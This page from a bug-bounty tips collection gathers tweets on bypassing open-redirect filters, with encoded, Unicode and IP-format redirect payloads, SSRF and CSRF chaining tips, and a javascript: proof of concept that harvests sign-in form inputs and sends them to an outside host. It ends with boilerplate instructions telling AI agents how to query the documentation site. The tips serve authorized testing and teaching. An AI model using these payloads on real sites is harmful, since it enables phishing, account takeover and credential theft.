# Open Redirect

* [file.php?url=/admin/ Redirects to: http://website.com/admin/ Put URL file.php?url=@google.com Now it is website.com@google.com which redirects to http://google.com!](https://twitter.com/LooseSecurity/status/1164579967184887809)
* [#bugbountytip Got an Open Redirect like this before. Website redirected to its own URL with input appended to it. Input @mywebsite.com and alter conf of your site to not prompt for login. URL: victim.com@mywebsite.com (browser thinks http://victim.com  is user). #BugBounty](https://twitter.com/LooseSecurity/status/1078630347464679424)
* [in some cases you can have an Open Redirect using %0d%0a and two "/" directly on the main url: http://victim//%0d%0ahttp://google.com/](https://twitter.com/k33r0k/status/1081589568405671936)
* [#bugbounty #bugbountytip Try to change protocol to bypass open redirect protection. http://example.com  -> ftp://example.com You might be lucky.](https://twitter.com/neeraj_sonaniya/status/1086911248845828101)
* [http:sitetoredirect , http%3asitetoredirect , http%253asitetoredirect](https://twitter.com/h1_kenan/status/1117084793852846080)

  [mostly works, for open redirect vulnerabilities.](https://twitter.com/h1_kenan/status/1117084793852846080)
* [Hold onto your open redirects. If you ever encounter SSRF then you can bypass same-origin filters using an open redirect. If they're just blocking localhost though, then create a redirect on your own website. #SSRF #infosec #CyberSecurity](https://twitter.com/LooseSecurity/status/1114317490157494272)
* [Bug Bounty Tip: Always check the content of a Redirection Page (302/301). especially if it requires authentification. And remember a Redirection Page is a good place to test issues like CRLF injection and Open Redirection.](https://twitter.com/sandh0t/status/1008636721163067393)
* [For open redirects, try using this character: 。The website thinks it's redirecting to a page on the site, but browsers convert it to a '.' thus completing the redirect. Usage: ?url=//google。com Goes to: https://google.com URL encoded: %E3%80%82](https://twitter.com/LooseSecurity/status/1179149212874952704)
* ["/%0d/domain\_address" is one of the best bypass in account takeover stealing tokens.](https://twitter.com/kunalp94/status/1195321932612169728)
* <https://twitter.com/pdeomare/status/1205402391526486017>
* [Found an interesting open redirect bypass today. Target would only allow \*.target.com, but if you entered hxxp://evil.com%EF%BC%http://A1.target.com, the backed would return hxxp://evil.com/?.target.com :D #bugbounty #unicode](https://twitter.com/dubs3c/status/1222273089418878976)
* [Bug bounty advice: If you have a GET request where developers added referer-based CSRF protection, use an on-site Open Redirect for this URL to get a whitelisted website in the Referer header. In the case when you have a POST request, try to change a method to GET.](https://twitter.com/0xw2w/status/1248688218326863872)
* [Open Redirect Through HTTP Pollution Attack.](https://twitter.com/darklotuskdb/status/1260837629718740992)

  [URL -> sub.dom-co/go/https/dom-co](https://twitter.com/darklotuskdb/status/1260837629718740992)

  [1) sub.dom-co/go/https/dom-co.evil-co/ -> 404](https://twitter.com/darklotuskdb/status/1260837629718740992)

  [2) sub.dom-co/go/https/dom-co/go/https/dom-co.evil-co/ -> Redirected To Evil website](https://twitter.com/darklotuskdb/status/1260837629718740992)
* [#BugBounty #bugbountytip #infosec For Open Redirects you can bypass a lot of WAF using a special character which a lot of browsers (such as FireFox) convert into a '.' which will complete your URL.\
  \
  The character is: 。\
  Usage: redirecthere。com#CyberSecurity](https://twitter.com/LooseSecurity/status/1074705120804376576)

![](/files/-M7g6EX6DGXjnb7vvpqH)

* When you find XSS over open redirect on sign-in/up pages, just capture the credentials and hijack them PoC: javascript:inpts=document.querySelectorAll('input');info='';for(i=0;i\<inpts.length;i++){info+=','+inputs\[i].value};location.href='<https://xhze.em/?'+info>
* Open Redirect Bypass: /path?redirect=//2130706433 or /path?redirect=//0x7f000001 It will redirect you to 127.0.0.1 Thank you for tip[@llt4l](https://twitter.com/llt4l) and[@dhyaniji](https://twitter.com/dhyaniji7)
* There are many DM people with me about this bug. As a result, I have consolidated all my processed "Open redirects" reports this month.

  Payloads bypass most filters:

  http:http:evil\[.]com http\:/evil%252ecom ///[www.x.com@evil.com](http://www.x.com@evil.com)
* when you are looking for bugs like SSRF & Open Redirect. and there is a blacklisted character. try to bypassed using other Unicode characters. I found Open Redirect Bypass Using (。) Chinese dot "%E3%80%82". poc: redirect\_to=////evil%E3%80%82com [#BugBounty](https://twitter.com/hashtag/BugBounty?src=hashtag_click) [#bugbountytip](https://twitter.com/hashtag/bugbountytip?src=hashtag_click)

**Blogs:**

{% embed url="<https://elmahdi.tistory.com/4>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gowsundar.gitbook.io/book-of-bugbounty-tips/open-redirect.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.